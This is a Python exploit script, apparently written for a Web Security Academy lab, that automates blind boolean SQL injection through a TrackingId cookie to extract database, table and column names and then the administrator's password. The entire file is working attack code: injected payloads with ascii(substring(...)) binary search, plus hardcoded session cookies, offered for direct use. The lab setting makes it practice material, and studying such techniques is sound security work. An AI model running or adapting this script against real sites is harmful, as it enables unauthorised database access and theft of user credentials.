#!/usr/bin python3
# coding: utf-8
import requests


url = "https://ac751f681e15522980cf1d8900860093.web-security-academy.net/filter?category=Pets"


def exp_db_name():
    """爆破数据库名"""
    res = []
    cookies_dic = {
        "TrackingId": "WnTIs22An1XL4Ftz",
        "session": "DAluu6oXIoHXDc0dxxg5bnDD8Ut9IooQ",
    }
    for i in range(1, 50):
        l, r, mid = 32, 127, (32 + 127) // 2
        while l < r:
            cookies_dic[
                "TrackingId"
            ] = f"WnTIs22An1XL4Ftz' and ascii(substring((select table_schema from information_schema.tables limit 1),{i},1)) > {mid}--"
            resp = requests.get(url=url, cookies=cookies_dic)
            if "Welcome" in resp.text:
                # 这种情况为正常回显 ascii-val > mid
                l = mid + 1
            else:
                # 这种情况为不正常回显 ascii-val <= mid
                r = mid
            mid = (l + r) // 2
            print(".", end="")
        res.append(chr(int(mid)))
        print("".join(res))  # ==> database name: public


def exp_tb_name():
    """爆破表名"""
    res = []
    cookies_dic = {
        "TrackingId": "yub0Bajo6dHx6so3",
        "session": "ASGAgTy8lsFwA5fFPz6TgbcYTGqtOpbV",
    }
    for i in range(1, 50):
        l, r, mid = 32, 127, (32 + 127) // 2
        while l < r:
            cookies_dic[
                "TrackingId"
            ] = f"yub0Bajo6dHx6so3' and ascii(substring((select concat(table_name) from information_schema.tables where table_schema='public' limit 1),{i},1)) > {mid}--"
            resp = requests.get(url=url, cookies=cookies_dic)
            if "Welcome" in resp.text:
                # 这种情况为正常回显 ascii-val > mid
                l = mid + 1
            else:
                # 这种情况为不正常回显 ascii-val <= mid
                r = mid
            mid = (l + r) // 2
            print(".", end="")
        res.append(chr(int(mid)))
        print("".join(res))  # ==> table name: users


def exp_cl_name():
    """爆破列/字段名"""
    res = []
    cookies_dic = {
        "TrackingId": "yub0Bajo6dHx6so3",
        "session": "ASGAgTy8lsFwA5fFPz6TgbcYTGqtOpbV",
    }
    for i in range(1, 50):
        l, r, mid = 32, 127, (32 + 127) // 2
        while l < r:
            cookies_dic[
                "TrackingId"
            ] = f"yub0Bajo6dHx6so3' and ascii(substring((select concat(column_name) from information_schema.columns where table_name='users' limit 1),{i},1)) > {mid}--"
            resp = requests.get(url=url, cookies=cookies_dic)
            if "Welcome" in resp.text:
                # 这种情况为正常回显 ascii-val > mid
                l = mid + 1
            else:
                # 这种情况为不正常回显 ascii-val <= mid
                r = mid
            mid = (l + r) // 2
            print(".", end="")
        res.append(chr(int(mid)))
        print(
            "".join(res)
        )  # payload中有痛点暂时无法解决；只爆破出一个字段名：username；通过题目提示和验证知道了另一个字段名为password


def exp_username_password():
    """爆破用户名和密码"""
    res = []
    cookies_dic = {
        "TrackingId": "yub0Bajo6dHx6so3",
        "session": "ASGAgTy8lsFwA5fFPz6TgbcYTGqtOpbV",
    }
    for i in range(1, 50):
        l, r, mid = 32, 127, (32 + 127) // 2
        while l < r:
            cookies_dic[
                "TrackingId"
            ] = f"yub0Bajo6dHx6so3' and ascii(substring((select concat(password,'~',username) from users where username='administrator'),{i},1)) > {mid}--"
            resp = requests.get(url=url, cookies=cookies_dic)
            if "Welcome" in resp.text:
                # 这种情况为正常回显 ascii-val > mid
                l = mid + 1
            else:
                # 这种情况为不正常回显 ascii-val <= mid
                r = mid
            mid = (l + r) // 2
            print(".", end="")
        res.append(chr(int(mid)))
        print("".join(res))  # where username='administrator' ==> password=''


if __name__ == "__main__":
    # exp_db_name()
    # exp_tb_name()
    # exp_cl_name()
    exp_username_password()
